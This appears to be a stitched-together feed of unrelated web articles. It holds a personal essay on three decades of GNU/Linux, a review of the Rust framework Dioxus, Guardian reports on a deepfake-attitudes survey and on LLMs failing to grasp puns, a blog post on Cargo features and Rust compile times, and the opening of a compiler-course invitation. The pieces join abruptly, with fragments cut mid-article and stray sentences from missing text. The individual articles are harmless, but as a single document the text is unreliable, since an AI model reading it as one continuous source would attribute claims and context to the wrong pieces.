, with GNU/Linux, back in 1996. It was my first real prompt after the Commodore 64 and DOS. It was my first step toward Unix systems, and it was love at first shell. I felt a sense of freedom - a freedom that the operating systems I had known up to that point (few, to be honest) had never given me. It was like a “blank sheet” (or rather, a black one) with a prompt on it. I understood immediately that this prompt, thanks to command chaining, pipes, and all the marvels of Unix and Unix-like systems, would allow me to do anything. And that sense of freedom is what makes me love Unix systems to this day.
I was young, but my intuition was correct. And even though I couldn't afford to keep a full Linux installation on that computer long-term due to hardware limitations, I realized that this would be my future. A year later, a new computer arrived, allowing me to use Linux daily, for everything. And successfully, without missing Windows at all (except for a small partition, strictly for gaming).
When I arrived at university, in 1998, I was one of the few who knew it. One of the few who appreciated it. One of the few who hoped to see a flourishing future for it. Everywhere. Widespread. A dream come true. I was a speaker at Linux Days, I actively participated in translation projects, and I wrote articles for Italian magazines. I was a purist regarding the "GNU/Linux" nomenclature because I felt it was wrong to ignore the GNU part - it was fundamental. Because
perhaps the "Year of the Linux Desktop" never arrived
, but Linux is now everywhere. On my desktop, without a doubt. But also on my smartphone (Android) and on those of hundreds of millions of people. Just as it is in my car. And in countless devices surrounding us - even if we don’t know it. And this is the true success. Let’s not focus too much on the complaint that "it’s not compatible with my device X". It is your device that is not compatible with Linux, not the other way around. Just like when, many years ago, people complained that their WinModems (modems that offloaded all processing to obscure, closed-source Windows drivers) didn't work on Linux. For "early adopters" like me, this concept has always been present, even though, fortunately, things have improved exponentially.
Linux was what companies accepted most willingly (not totally, but still...): the ongoing lawsuits against the BSDs hampered their spread, and Linux seemed like that "breath of fresh air" the world needed.
Linux and its distributions (especially those untethered from corporations, like Debian, Gentoo, Arch, etc.) allowed us to replicate expensive "commercial" setups at a fraction of the cost. Reliability was good, updating was simple, and there was a certain consistency. Not as marked as that of the BSDs, but sufficient.
The world was ready to accept it, albeit reluctantly. Linus Torvalds, despite his sometimes harsh and undiplomatic tone, carried forward the kernel development with continuity and coherence, making difficult decisions but always in line with the project. The "move fast and break things" model was almost necessary because there was still so much to build. I also remember the era when Linux - speaking of the kernel - was designed almost exclusively for x86. The other architectures, to simplify, worked thanks to a series of adaptations that brought most behavior back to what was expected for x86.
And the distributions, especially the more "arduous" ones to install, taught me a lot. The distro-hopping of the early 2000s made me truly understand partitioning, the boot procedure (Lilo first, then Grub, etc.), and for this, I must mainly thank Gentoo and Arch (and the FreeBSD handbook - but this is for another article). I learned the importance of backups the hard way, and I keep this lesson well in mind today. My Linux desktops ran mainly with Debian (initially), then Gentoo, Arch, and openSUSE (which, at the time, was still called "SUSE Linux"), Manjaro, etc. My old 486sx 25Mhz with 4MB (yes, MB) of RAM, powered by Debian, allowed me to download emails (mutt and fetchmail), news (inn + suck), program in C, and create shell scripts - at the end of the 90s.
When Linux Conquered the World
Then the first Ubuntu was launched, and many things changed. I don't know if it was thanks to Ubuntu or simply because the time was ripe, but attention shifted to Linux on the desktop as well (albeit mainly on the computers of us enthusiasts), and many companies began to contribute actively to the system or distributions.
I am not against the participation of large companies in Open Source. Their contributions can be valuable for the development of Open Source itself, and if companies make money from it, good for them. If this ultimately leads to a more complete and valid Open Source product, then I welcome it! It is precisely thanks to mass adoption that Linux cleared the path for the acceptance of Open Source at all levels. I still remember when, just after graduating, I was told that Linux (and Open Source systems like the BSDs) were "toys for universities". I dare anyone to say that today!
But this must be done correctly: without spoiling the original idea of the project and without hijacking (voluntarily or not) development toward a different model. Toward a different evolution. The use of Open Source must not become a vehicle for a business model that tends to close, trap, or cage the user. Or harm anyone. And if it is oriented toward worsening the product solely for one's own gain, I can only be against it.
What Changed Along the Way
And this is where, unfortunately, I believe things have changed in the Linux world (if not in the kernel itself, at least in many distributions). Innovation used to be disruptive out of necessity. Today, in many cases, disruption happens without purpose, and stability is often sacrificed for changes that do not solve real problems. Sometimes, in the name of improved security or stability, a new, immature, and unstable product is created - effectively worsening the status quo.
To give an example, I am not against systemd on principle, but I consider it a tool distant from the original Unix principles - do one thing and do it well - full of features and functions that, frankly, I often do not need. I don't want systemd managing my containerization. For restarting stopped services? There are monit and supervisor - efficient, effective, and optional. And, I might add: services shouldn't crash; they should handle problems in a non-destructive way. My Raspberry Pi A+ doesn't need systemd, which occupies a huge amount of RAM (and precious clock cycles) for features that will never be useful or necessary on that platform.
But "move fast and break things" has arrived everywhere, and software is often written by gluing together unstable libraries or those laden with system vulnerabilities. Not to mention so-called "vibe coding" - which might give acceptable results at certain levels, but should not be used when security and confidentiality become primary necessities or, at least, without an understanding of what has been written.
We are losing much of the Unix philosophy, and many Linux distributions are now taking the path of distancing themselves from a concept of cross-compatibility ("if it works on Linux, I don't care about other operating systems"), of minimalism, of "do one thing and do it well". And, in my opinion, we are therefore losing many of the hallmarks that have distinguished its behavior over the years.
In my view, this depends on two factors: a development model linked to a concept of "disposable" electronics, applied even to software, and the pressure from some companies to push development where they want, not where the project should go. Therefore, in certain cases, the GPL becomes a double-edged sword: on one hand, it protects the software and ensures that contributions remain available. On the other, it risks creating a situation where the most "influential" player can totally direct development because - unable to close their product - they have an interest in the entire project going in the direction they have predisposed. In these cases, perhaps, BSD licenses actually protect the software itself more effectively. Because companies can take and use without an obligation to contribute. If they do, it is because they want to, as in the virtuous case of Netflix with FreeBSD. And this, while it may remove (sometimes precious) contributions to the operating system, guarantees that the steering wheel remains firmly in the hands of those in charge - whether foundations, groups, or individuals.
And Why I Still Care
And so yes, despite all this, I (still) love Linux.
Because it was the first Open Source project I truly believed in (and which truly succeeded), because it works, and because the entire world has developed around it. Because it is a platform on which tons of distributions have been built (and some, like Alpine Linux, still maintain that sense of minimalism that I consider correct for an operating system). Because it has distributions like openSUSE (and many others) that work immediately and without problems on my laptop (suspension and hibernation included) and on my miniPC, a fantastic tool I use daily. Because hardware support has improved immensely, and it is now rare to find incompatible hardware.
Because it has been my life companion for 30 years and has contributed significantly to putting food on the table and letting me sleep soundly. Because it allowed me to study without spending insane amounts on licenses or manuals. Because it taught me, first, to think outside the box. To be free.
So thank you, GNU/Linux.
Even if your btrfs, after almost 18 years, still eats data in spectacular fashion. Even if you rename my network interfaces after a reboot. Even though, at times, I get the feeling that you’re slowly turning into what you once wanted to defeat.
Even if you are not my first choice for many workloads, I foresee spending a lot of time with you for at least the next 30 years.
To cover any upcoming legal fees just in case Nintendo doesn’t buy that
origin story, Dioxus is, as of the summer of 2023, a YCombinator startup.
Regulars might be wondering at this point, what does any of that have to do with
Rust? Well, don’t worry, I have gone and checked for you: Dioxus
is
, in fact,
getting money from Huawei, which makes it a Rust project just like any other.
Please find on this diagram, in red, every Rust project funded by Huawei,
or any other kind of -wei.
Dioxus is the promise of having a single code base for your mobile apps and web
apps and desktop apps. It makes me think of React Native or PhoneGap. If you’ve
heard of
PhoneGap
, remember to stretch. It’s very important at our ages.
Dioxus “fullstack” goes one step further, with a single code base for the client
and for the server. But what does that mean? How did we get here? Let’s go back
in time for a minute or twelve.
There’s been plenty of different paradigms when it comes to web apps, and I
won’t cover them all.
In short, in the first generation, “generating HTML” is the job of the server. You
are allowed to sprinkle some JavaScript (or, god forbid, Visual Basic Script) to
make some stuff move, but that’s as far as it goes.
Note that I’m saying “render” in that diagram for “generating HTML”, with my
apologies to people who work on
Servo
and
Skia
and whatnot. I’m just reusing the React nomenclature,
sowwy.
In the second generation of web apps, the world has now written a critical mass
of JavaScript. We’re starting to have something that resembles DevTools. If you
remember
Firebug
, that was among the first. And maybe you should work on a will
or something like that.
We’re starting to get comfortable with the idea of a real application living
inside of the web browser, which renders HTML based on structured data coming
from the server. And then follows a decade of developers using something called
“XMLHttpRequest” to send JSON around. Oh well.
We’re starting to have web apps that work offline. However, the initial loading
experience is bad. Visitors have to wait for the entire app to load,
then they wait for the app to do its API calls, and then for the app to render the
HTML, which can take a long time: planet earth is starting to develop a
collective distaste for the spinner.
And that’s not the only problem we’ll have to address for SPAs (single-page
apps). We’ll have accessibility, navigation history, search engine optimization,
and of course, data loading. If every component on a page does its own API
request to get some data and then render, that’s a lot of requests per page.
Especially if you looked at React the wrong way and your component is doing API
calls in an infinite loop, then it’s a lot, a lot, a lot of API calls. And yes,
that is actually what took Cloudflare down
recently.
So boom, third generation, full stack, best of both worlds. We do the render on
the server like before, and we stream it to the client, which can display it as
it’s being received. But alongside that rendered HTML, the server also sends the
structured data that it used to render the HTML.
Here’s a practical example. It’s a counter written in Dioxus:
#
[
component
]
fn
Counter
(
)
->
Element
{
let
mut
x =
use_signal
(
||
0_u64
)
;
let
inc =
move
|_| x +=
1
;
let
dec =
move
|_| x -=
1
;
rsx
!
{
"{x}"
button
{
onclick
:
inc
,
"+"
}
button
{
onclick
:
dec
,
"-"
}
}
}
When we do the server-side rendering, we just say, okay, there is a variable x
that starts at zero. It’s used in the macro RSX, and then there’s two buttons.
The two buttons do something if you click on them, but can we do something about
it on the server side? No, those event handlers have to be registered on the
client side. All we can do is send hints.
There’s no
onclick
attribute on the button tags directly. There’s only
information that references the structured data (that I’m not showing you here to
avoid a wall of text).
So the client has the same data the server had. It’s doing the same render as
the server did and then it creates a mapping between what the server sent and
what the client rendered. Then it takes over the document, installing event
handlers, making everything interactive, a process we call hydration.
Now the whole point of having the server stream markup is that we can show it
early before the app is even loaded on the client. But what happens if we click
on a button in the middle of the hydration process?
In theory, the server markup could include actual links or forms that would
trigger regular browser actions. But in practice, it’s been a while since I’ve
seen anybody bother doing that.
Now, what happens if during hydration the client render doesn’t match the server
render? Then it can’t create a mapping and everything’s broken. I think the best
case you can do here is just replace everything with the version that the client
rendered, which is still pretty bad as everything would jump around.
And now what if we need data that takes some time to fetch? For example, we’re
fetching from a database or an API. That’s a family of problems that the
industry has been trying to solve for years. And Dioxus offers several solutions
in the form of hooks:
try_use_context
use_after_suspense_resolved
use_callback
use_context
use_context_provider
use_coroutine
use_coroutine_handle
use_effect
use_future
use_hook
use_hook_did_run
use_hook_with_cleanup
use_route
use_router
use_navigator
use_memo
use_memo
use_on_unmount
use_reactive
use_resource
use_root_context
use_set_compare
use_set_compare_equal
use_signal
use_signal_sync
use_reactive!
use_server_future
use_server_cached
use_drop
use_before_render
use_after_render
So there’s a little something for everyone. There’s synchronous hooks. There’s
asynchronous hooks. There’s reactive hooks. There’s hooks that cache the
results. There are hooks that only run on the server side or only on the client
side.
It’s a little bit intimidating, to be honest. We’re far from the “if it compiles
it works” that I got used to, in Rust?
If you break the rules of hooks, you don’t get a build error or even a runtime
error. You just get a weird behavior, which can be hard to debug.
But there’s kind of a good reason for that.
It’s that full stack stuff is complicated. It truly is. It’s not that Dioxus
added complexity where we didn’t need any. It’s that this is a problem that’s
inherently complex.
But as I dug deeper, I realized that most of my complaints were really just
misunderstandings, or already in the process of being fixed in the main branch,
or simply limitations of the current WebAssembly/Rust ecosystem.
I was going to start with praising the developer experience of Dioxus with their
dx
tool, which wraps cargo and takes care of compiling WebAssembly.
I was going to praise the loading screen you see in the browser while it’s
compiling everything…
But then I was going to complain about the fact that if there’s a panic in the
app, it just becomes unresponsive! There is nothing that shows you that
something went wrong and the entire app is broken!
Well, in the main branch, there is! Of course they added it! It makes sense, and
they are smart people using their own stuff.
Next, I was going to complain that the stack traces are completely useless
because all we see are function names with numbers and hexadecimal offsets into
a big WASM file.
But since then, I’ve found this Chrome extension called
C/C++ DevTools Support
(DWARF)
, which looks exactly like what someone would come up with if they were
trying to target me specifically with malware.
And yet it works, it doesn’t actually give us the name of the functions but it
does show the name of source files and lines. And if you click them they open up
in DevTools, and you can place breakpoints, you can step in, step over, step out
like a real debugger.
It’s honestly a lot better than I imagined. I didn’t even know we were so far
with WASM debugging or that we had picked DWARF for that but I guess that makes
sense.
Next, I was going to complain about Subsecond, their hot patching thing.
So, what is hot patching? When you develop a web application, it’s kind of a
given now because of React and Svelte and whatnot, that you should be able to
modify source code that corresponds to a component and that When saving that
file in your editor, the change should apply directly in your browser without
changing the state of the application.
So if you’ve navigated deep into your application’s hierarchy, hot patching
doesn’t reload you back to the start page. It doesn’t reload the page at all.
Instead, it updates only the components that have changed on the current page.
And I thought I was using that with Dioxus and I thought, wow, it doesn’t really
work well at all. It actually does lose state and it’s not actually under a
second. It turns out I hadn’t enabled it. I forgot. You have to pass
--hot-patch
and I… didn’t know.
When I did enable it, I noticed that it worked really well. Like, well, it
crashes all the time, because what it’s doing is a lot more complicated than the
JavaScript framework, and it’s still early days. But the promise is here. You
can make a change and see the result very quickly in your browser.
And you wanna know something funny? When you enable hotpatching, Stacktraces
show the actual mangled name of Rust functions. But, it also breaks DWARF
debugging, so uhhh.. your choice I guess.
It’s time to answer the question, does Dioxus spark joy? I’m gonna say: not yet.
For now, without subsecond and everything, it’s still really unpleasant for the
most part, compared to Svelte 5 which is my gold standard. But I can see what
the Dioxus team is going for and I’m really excited for it.
I was kind of skeptical going into this. I was like: I’m gonna get Rust enums,
which is great, but everything else is going to
suck
.
But I was wrong! The generational references make event handlers not actually
miserable to write. Server-side functions with web sockets actually work pretty
well. And get rid of a lot of boilerplate.
The Dioxus team is doing a lot of hard, interesting work. They have a
Flexbox
implementation
that they’re sharing with Servo.
They’re doing their own HTML and CSS renderer now to make desktop applications
without a full-fledged web engine.
I’m very much looking forward for Dioxus and the entire WASM on the front-end
ecosystem to catch up with the JavaScript-based solutions in terms of developer
ergonomics.
In the meantime, I’ll be doing Rust on the backend, and TypeScript on the
frontend.
So since I gave this talk, I’ve written several thousand lines of dioxus for
an upcoming project, which… made the conclusion a lie I guess. I still feel
conflicted about it, but I guess I’m also invested in it now. Let’s… see
where this goes!
(JavaScript is required to see this. Or maybe my stuff broke)
Did you know I also make videos? Check them out on
PeerTube
and also
YouTube
!
Here's another article just for you:
One in four unconcerned by sexual deepfakes created without consent, survey finds
Guardian
www.theguardian.com
2025-11-24 09:00:32
Senior UK police officer says AI is accelerating violence against women and girls and that technology companies are complicit One in four people think there is nothing wrong with creating and sharing sexual deepfakes, or they feel neutral about it, even when the person depicted has not consented, ac...
One in four people think there is nothing wrong with creating and sharing sexual deepfakes, or they feel neutral about it, even when the person depicted has not consented, according to a police-commissioned survey.
The findings prompted a senior police officer to warn that the use of AI is accelerating an epidemic in violence against women and girls (VAWG), and that technology companies are complicit in this abuse.
The survey of 1,700 people commissioned by the office of the police chief scientific adviser found 13% felt there was nothing wrong with creating and sharing sexual or intimate deepfakes – digitally altered content made using AI without consent.
A further 12% felt neutral about the moral and legal acceptability of making and sharing such deepfakes.
Det Ch Supt Claire Hammond, from the national centre for VAWG and public protection, reminded the public that “sharing intimate images of someone without their consent, whether they are real images or not, is deeply violating”.
Commenting on the survey findings, she said: “The rise of AI technology is accelerating the epidemic of violence against women and girls across the world. Technology companies are complicit in this abuse and have made creating and sharing abusive material as simple as clicking a button, and they have to act now to stop it.”
She urged victims of deepfakes to report any images to the police. Hammond said: “This is a serious crime, and we will support you. No one should suffer in silence or shame.”
Creating non-consensual sexually explicit deepfakes is a criminal offence under the new Data Act.
The report, by the crime and justice consultancy Crest Advisory, found that 7% of respondents had been depicted in a sexual or intimate deepfake. Of these, only 51% had reported it to the police. Among those who told no one, the most commonly cited reasons were embarrassment and uncertainty that the offence would be treated seriously.
The data also suggested that men under 45 were likely to find it acceptable to create and share deepfakes. This group was also more likely to view pornography online and agree with misogynistic views, and feel positively towards AI. But the report said this association of age and gender with such views was weak and it called for further research to explore this apparent association.
One in 20 of the respondents admitted they had created deepfakes in the past. More than one in 10 said they would create one in the future. And two-thirds of respondents said they had seen, or might have seen, a deepfake.
The report’s author, Callyane Desroches, head of policy and strategy at Crest Advisory, warned that the creation of deepfakes was “becoming increasingly normalised as the technology to make them becomes cheaper and more accessible”.
She added: “While some deepfake content may seem harmless, the vast majority of video content is sexualised – and women are overwhelmingly the targets.
“We are deeply concerned about what our research has highlighted – that there is a cohort of young men who actively watch pornography and hold views that align with misogyny who see no harm in viewing, creating and sharing sexual deepfakes of people without their consent.”
Cally Jane Beech, an activist who campaigns for better protection for victims of deepfake abuse, said: “We live in very worrying times, the futures of our daughters (and sons) are at stake if we don’t start to take decisive action in the digital space soon.
She added: “We are looking at a whole generation of kids who grew up with no safeguards, laws or rules in place about this, and are now seeing the dark ripple effect of that freedom.
“Stopping this starts at home. Education and open conversation need to be reinforced every day if we ever stand a chance of stamping this out.”
Can’t tech a joke: AI does not understand puns, study finds
Guardian
www.theguardian.com
2025-11-24 07:59:34
Researchers say results underline large language models’ poor grasp of humour, empathy and cultural nuance Comedians who rely on clever wordplay and writers of witty headlines can rest a little easier, for the moment at least, research on AI suggests. Experts from universities in the UK and Italy ha...
An example they tested was: “I used to be a comedian, but my life became a joke.” If they replaced this with: “I used to be a comedian, but my life became chaotic,” LLMs still tended to perceive the presence of a pun.
They also tried: “Long fairy tales have a tendency to dragon.” If they replaced “dragon” with the synonym “prolong” or even a random word, LLMs seemed to believe there was a pun there.
Prof Jose Camacho Collados
, of Cardiff University’s school of computer science and informatics, claimed the research suggested LLMs’ grasp of humour was fragile.
“In general, LLMs tend to memorise what they have learned in their training. As such, they catch existing puns well but that doesn’t mean they truly understand them,” he said.
“We were able to consistently fool LLMs by modifying existing puns, removing the double meaning that made the original pun. In these cases, models associate these sentences with previous puns, and make up all sort of reasons to justify they are a pun. Ultimately, we found their understanding of puns is an illusion.”
The team concluded that when faced with unfamiliar wordplay, the LLMs’ success rate in distinguishing puns from sentences without a pun can drop to 20%.
Another pun tested was: “Old LLMs never die, they just lose their attention.” When attention was changed to “ukulele”, the LLM still perceived it as a pun on the basis that “ukulele” sounded a bit like “you-kill-LLM”.
The team was surprised at the creativity, but still, the LLM had not got the joke.
The researchers said the work underlined why people should be cautious when using LLMs for applications that need an understanding of humour, empathy or cultural nuance.
Two common criticisms of Rust development are the long compile times and the large number of dependencies that end up being used in projects. While people have drawn connections between these issues before, I've noticed that most discussions don't end up talking much about a specific tool that ostensibly should help mitigate this issue: Cargo features. For those not already familiar with Cargo features, I'd recommend
the Rust book
as an authoritative source of documentation for how they work; for those not interested in having to read something external to understand the rest of this post, here's a brief summary of how they work:
When creating a Rust package...
you can define any number of "features"
a feature can be tied to one or more "optional" dependencies, which will get included if the feature is enabled by downstream users and will
not
be included if disabled by downstream users
a feature can depend on other features (either from within the same package or its dependencies), which will transitively include them whenever the feature that required them is enabled
code inside the package can be conditionally included or excluded based on whether certain features are enabled or disabled
the package defines which subset of the features are enabled by default
When depending on a Rust package that uses features...
without specifying any additional details, the default set of features defined by the package will be used
individual features can be enabled by manually listing them in the details of a dependency configuration
default features can be disabled completely for a given dependency, meaning that only the individually listed features will be enabled
a dependency that is specified more than once (either transitively by multiple direct dependencies or both directly and transitively) using versions that are considered compatible in terms of
SemVer
will be "unified", which means the union of sets of specified features will be enabled
In case this is confusing, here's a concrete example: imagine a package called
D
has features called
foo
,
bar
, and
baz
. Package
A
depends directly on version 1.1.1 of
D
and specifies it uses the features
foo
and
bar
from it.
A
also depends directly on packages
B
and
C
.
B
depends directly on version 1.2.0 of
D
and uses the feature
baz
. Finally,
C
depends on version 1.5.0 of package
D
but doesn't specify any features. When compiling package
A
and its dependencies, package
D
will have features
foo
,
bar
, and
baz
enabled for all of
A
,
B
, and
C
At a high level, Cargo features give package authors a way to allow users to opt into or out of parts of their package, and in an ideal world, they would make it easy to avoid having to compile code from dependencies that you don't need. For those familiar with other languages that provide similar functionality, this might be recognizable as a form of
conditional compilation
. It's worth noting that one of the common uses of feature flags is giving users the ability to opt out of coding using
procedural macros
, which often have an outsized impact on compile times. However, there are some quirks in the ways that features work that at least to me seem to get in the way of this happening in practice, and I've increasingly started to feel like they're a key piece of why the Rust ecosystem hasn't been able to improve the situation around compilation times and dependency bloat significantly.
Problems with "default-features"
In my opinion, the ergonomics around defining and using the default set of features get in the way of trying to reduce bloat and compile times. For example, by default, cargo doesn't show anything about what features are enabled in a dependency you've added. Here's an extremely contrived demonstration of how this might end up happening in a package I've defined a locally:
# my-package/Cargo.toml
[package]
name = "my-package"
version = "0.1.0"
edition = "2021"
[dependencies]
my-dependency = { path = "../my-dependency" }
It imports another package that I've defined locally alongside it as a dependency. Currently, there's absolutely no code in this package other than the dependency:
# my-package/src/main.rs
fn main() {
}
Let's compile it!
$ time cargo build
Compiling my-dependency v0.1.0 (/home/saghm/.scratch/my-dependency)
Compiling my-package v0.1.0 (/home/saghm/.scratch/my-package)
Finished `dev` profile [unoptimized + debuginfo] target(s) in 3.10s
real 0m3.155s
user 0m1.929s
sys 0m1.281s
Hmm, over three seconds to build a seemingly empty package in debug mode. Let's take a look at
my-dependency
to see what's going on.
# my-dependency/Cargo.toml
[package]
name = "my-dependency"
version = "0.1.0"
edition = "2021"
[features]
default = ["foo"]
foo = []
[dependencies]
my-dependency
has a feature called "foo". We definitely didn't make any explicit choice to include it in
my-package
, and the
cargo build
output didn't mention it at all, but it's still going to be included by default because it's in the default feature list. What does the feature do though?
Whoops! Turns out someone defined a static array of 400,000 bytes of zeroes and exported it under the
foo
feature flag. What happens if we disable that feature in our original package?
$ cargo clean && time cargo build
Removed 32 files, 1007.6MiB total
Compiling my-dependency v0.1.0 (/home/saghm/.scratch/my-dependency)
Compiling my-package v0.1.0 (/home/saghm/.scratch/my-package)
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.20s
real 0m0.255s
user 0m0.152s
sys 0m0.107s
A fifth or a quarter of a second, depending on if you ask
cargo
or
time
. Either way, much better!
This example is obviously very silly, but at a high level, there's nothing stopping something similar from happening with real-world code because there's no obvious feedback given when using default features from dependencies.
The fact that default features can only be opted out of entirely rather than disabled individually can also be mildly annoying. If a package exposes 10 default features, and you want to disable only one of them, the only way to do this currently is to disable all default features and then manually enable the nine that you
don't
want to disable. (As an aside, this also means that introducing new default features won't necessarily cause all packages that depend on it to get them by default; in the previous example, increasing the number of default features to 11 would cause the above strategy to disable both the feature it previously disabled
and
the newly default feature. While this isn't necessarily a bad thing from the perspective of compile times, I'd still argue that this happening in a mostly hidden way to users who upgrade isn't ideal, and that this problem would be better avoided by having a more granular mechanism for disabling default features.)
Problems with transitive dependencies
It might sound like the issues with bloat from features would be mitigated by avoiding marking features as default, but there's an additional issue that would still prevent this from improving things very much. The only mechanism that currently exists for a library to expose the features of its dependencies transitively is to define its own features that each "map" to the features of its dependencies. Using the contrived example from above,
my-package
could define a feature that depends on the
foo
feature of
my-dependency
, and end-users of
my-package
could choose whether to include that feature or not. Without that, users of
my-package
will always end up with the exact set of features from
my-package
that
my-package
defines; either all users of
my-package
get the
foo
feature from
my-dependency
or none of them would. In other words, Cargo doesn't provide any way to configure the set of features included from transitive dependencies.
Imagine if you've created a library that has five dependencies, and none of those have any dependencies of their own. Not too bad compared to a lot of Rust packages! In order to do their part to combat bloat and compile times, each of those libraries define five optional features, with the idea that users of the package can avoid compiling the parts they don't need. If you don't necessarily need those features in your own library, but you happen to expose types from all five of those crates in your own API, you'd need to define twenty-five features in your own crate to give your users the option to avoid the bloat. The situation gets even worse when you consider transitive dependencies; if each of those five dependencies even had a single dependency of their own with two optional features, and they followed the same strategy of exposing these as well, you'd need to add another ten features to your package after the initial just to avoid forcing users of your own code to include code they don't need that you
haven't written
—on top of any features you define for users to avoid unnecessary bloat from your own code!
This is why I don't think that cleaning up the situation on how default dependencies are specified would end up being sufficient to alleviate the current situation. Even if we had a magic wand that we could wave and "fix" every library in the ecosystem to define a bunch of features to disable arbitrary code (both from themselves and mapping to the features of their dependencies), the number of transitive features that would need to be disabled transitively to actually eliminate all of the unnecessary code currently would be absolutely
massive
. To me, this is a fundamental flaw with what otherwise could be an effective way to reduce compile times in Rust without having to drastically change the way people use dependencies today.
What might help with these issues?
I think there are a number of possible changes that could be made that would mitigate or potentially even eliminate the issues I've described here. Some of the ideas I have would probably cause incompatibilities with the way things currently work, and while there are some existing strategies that might make them less disruptive (like tying them to a bump in the
feature resolver version
), I don't have enough expertise to know the exact details of how that would work. I'm also not entirely certain that the ideas I have would even be possible to implement, or that they would actually improve the compile times and bloat rather than make them worse due to consequences that haven't occurred to me. Given all of that, I'd characterize the remainder of this post as brainstorming rather than recommendations or even realistic suggestions. If the issues I've outlined above resonate with others who read this post, hopefully smarter people than me with far more domain expertise will come up with an effective way to deal with them.
With that said, these are some of the potential mitigations for these issues I've come up with along with my extremely unscientific attempt to quantify how much I'd expect them to improve the situation, the amount effort to implement them, and my confidence that my assessment of their impact is correct:
Providing a mechanism to manually disable individual default features when specifying a dependency
Low impact
- This wouldn't drastically improve the status quo, but it would make trying to avoid bloat slightly easier in some situations
Low effort
- I'd expect this to be mostly straightforward to implement
High confidence
- The scope of this change is small enough that I don't think it's likely there are drastic unintended consequences that I haven't considered (although that doesn't necessarily mean that everyone would be happy with the consequences that
are
intended!)
Providing a less verbose way for libraries to expose the features of their direct dependencies to other packages that depend on them directly
Low impact
- The direct impact of this change would essentially just be ergonomic, and it would only affect packages that reexport parts of their dependencies to their own users. If this included a way to disable transitive features that aren't needed, this could potentially make a large impact in the long run, but only if enough features ended up being exposed from libraries for people to disable enough code to make a difference
Medium effort
- At minimum, this would require augmenting the
Cargo manifest format
to define a way to configure this, and I don't have enough expertise in the way the feature resolver works to feel safe in assuming that this would be possible without changes there as well
Medium confidence
- I do think there's a small chance that this might not be feasible for some reason, but I also think there's a small chance that this change could have an outsized impact in alleviating the issues; eliminating the need to account for an exponential growth in feature count makes the "magic wand" to give us a world where all existing Rust APIs are sliced into bite-sized features much more enticing, so maybe we'll be lucky and giving the ecosystem enough incentive could cause people to start working towards making that hypothetical situation a reality
Providing a way to disable features from transitive dependencies
Low impact
- This is essentially the same as the previous idea, only configured from the package inheriting features transitively rather than the one exposing them
Medium effort
- I wouldn't be surprised if there was some additional work compared to the previous idea around handling conflicts when someone tries to disable a transitive feature that's required by the dependency they inherit it from, but this might not end up being hard to solve in practice
Low confidence
- Overall, I think this would end up being a messier way to achieve the same results as the previous idea. However, there's some value in allowing people to fix bloat in their own packages without requiring changes from every dependency along the transitive chain, and it's possible that I'm underestimating the magnitude of that additional value
"Zero-config" features that allow enabling/disabling code in a library without the author having to manually define it
High impact
- This would be the "magic wand" that I mentioned a few times above. The exact impact would depend on the granularity of the features it defines, but at the extreme end, automatically defining a separate feature for every individual item that gets exposed as part of a library's API could provide away to avoid including
any
code that isn't used, like a compile-time version of the
Unix
strip
utility
High effort
- The amount of work needed to implement this would be substantial at pretty much every step of the process: designing how it should work, implementing the design, testing that it works correctly, and benchmarking the results on real-world codebases to validate that it actually helps
Low confidence
: It's not clear to me whether this would be possible to do in a way that ended up being beneficial in practice.
Of the ideas listed here, this is definitely the most radical, so I wouldn't be surprised if some people react strongly to it. However, it's the idea that I think would have the most potential to improve things, so I think it deserves some additional elaboration on my part.
The first objection I'd expect to hear to this idea would be feasibility; it might not be obvious whether this can even be done in practice. I do think there are at least two potential ways that this would be at least possible to implement correctly: "one feature for every item in the crate" and "one feature for every module in the crate". At least from a computability perspective, it seems like it would be possible to enumerate each of these for a given library and define a corresponding feature, and then determine which (if any) of the others each of them depends on. Once that graph of feature dependencies is obtained, resolving the features that actually get used would presumably follow the same rules as resolving explicitly defined features.
The other objection I'd expect to hear is whether this would actually end up reducing compile times in practice. This concern is much harder for me to dismiss, and it's the reason I listed my confidence in the idea as "low". Any time saved by avoiding compilation of unused code would be offset by cost of having to determine how the features depend on each other, and there would be a tradeoff when deciding the amount of code in each of these features; having a larger number of "smaller" features would increase the amount of code that could be eliminated from compilation, but it would increase the amount of work needed to determine which of these features depend on each other. The amount of compilation that could be avoided could vary dramatically based on what parts of the library's API are being used, and the dependency graph of features might end up being so deep that the extra work to split into smaller features wouldn't end up eliminating more code than if a smaller set of "larger" features were picked instead.
Despite not being super confident that this would end up as a net improvement in compile times, this is still the idea I'm most interested in seeing discussed. Maybe someone will make a compelling enough argument against it that I'll change my mind, and most likely the idea won't end up going anywhere regardless of what my opinion is, but there's always a small chance that I was lucky enough to come up with a useful idea, and then we can all enjoy the benefits of having lower compile times finally.
Are you interested in building a compiler? Learning how functional
languages are implemented? Gaining a bit of practical experience with
x86-64 assembly language? If so, I invite you to try your hand at the
projects in my class,
CIS531
. CIS531 is a masters-level
class on compiler design which assumes that (a) you know how to
program, (b) you’ve had some exposure to C (know about stack
allocation, malloc, etc.), and (c) have seen some assembly code. My
class projects are in the Racket programming language, but if you
don’t know Racket, it is quite easy to learn: I have a
set of YouTube
video lectures that teach Racket
quickly
!
If you’ve never heard of Racket before, or you’re skeptical of
functional programming, indulge me for a bit: there’s no hardcore FP
theory or math in this course, and Racket is genuinely the best
language to use for this specific setup.
My class follows Prof. Jeremy Siek’s excellent book, “Essentials of
Compilation.” While I highly recommend buying the book and supporting
Prof. Siek, I will also note that there are
free online preliminary
editions
floating around; in my class, I followed the free version and
suggested that students buy the book if doing so fit their
goals. However, along with the book, I also have a set of class slides
along with sporadic course videos, both available on the
class
website
.
This class builds up to a compiler with the following features:
Variables and assignment via
let
Integer arithmetic via
+
and
-
Reading inputs / printing output
Booleans, conjunctions/disjunctions (and/or)
Branching via
if
, integer comparisons (<, etc.)
Heap-allocated vectors
Assignment / mutation (
set!
)
While loops
Fixed-arity functions and function application
Lambdas (closures at runtime)
The unique combination of features lets us tour an interesting
cross-section of programming languages, exploring both imperative
programming with loops and mutation but also functional programming
with lists and recursion.
The Projects
To be specific, I challenge you to complete five projects, each
including a comprehensive test suite that will seriously stress the
correctness of your implementation. p1 is a warmup project (you should
skip if you already know Racket), but p2-5 build a compiler for a set
of increasingly-complex languages to x86-64. The languages nest inside
of each other, with p2 giving us straight-line arithmetic, p3 giving
us decision trees, p4 giving us loops and mutation, and p5 giving us
functions, recursion, and lambdas.
p1 – Stack interpreter
. This is
a warmup project, if you know Racket and have some PL background,
feel free to skip.
The projects are designed with one key principle in mind: get us to
the
most expressive/fun language possible, as fast as possible
. In
